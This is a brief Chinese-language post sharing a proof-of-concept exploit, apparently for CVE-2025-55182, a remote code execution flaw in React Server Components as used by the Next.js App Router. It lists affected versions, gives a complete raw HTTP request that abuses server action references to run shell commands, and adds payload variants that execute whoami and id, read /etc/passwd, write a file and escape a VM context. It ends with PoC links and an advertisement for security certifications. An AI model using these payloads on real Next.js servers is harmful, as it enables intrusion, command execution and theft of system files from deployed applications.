几乎所有 Next.js 应用都使用了包含 fs 的包,真大洞!
react-server-dom-webpack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
Next.js: 15.x, 16.x (App Router)
npm installnode --conditions react-server --conditions webpack src/server.js
复现数据包:POST /formaction HTTP/1.1Host: localhost:3002Content-Type: multipart/form-data; boundary=----BoundaryContent-Length: 297------BoundaryContent-Disposition: form-data; name="$ACTION_REF_0"------BoundaryContent-Disposition: form-data; name="$ACTION_0:0"{"id":"vm#runInThisContext","bound":["global.process.mainModule.require(\"child_process\").execSync(\"id\").toString()"]}------Boundary--
{ id: 'child_process#execSync', bound: ['whoami'] }{ id: 'fs#readFileSync', bound: ['/etc/passwd'] }{ id: 'fs#writeFileSync', bound: ['/tmp/pwned.txt', 'CVE-2025-55182'] }{id: 'vm#runInThisContext',bound: ['process.mainModule.require("child_process").execSync("id").toString()']}{id: 'vm#runInNewContext',bound: ['this.constructor.constructor("return process")().mainModule.require("child_process").execSync("whoami").toString()']}
https://github.com/ejpir/CVE-2025-55182-poc/https://pan.quark.cn/s/d72c76a455c5
CISP、NISP、CISP-PTE 等安全证书考证+Admin_Ran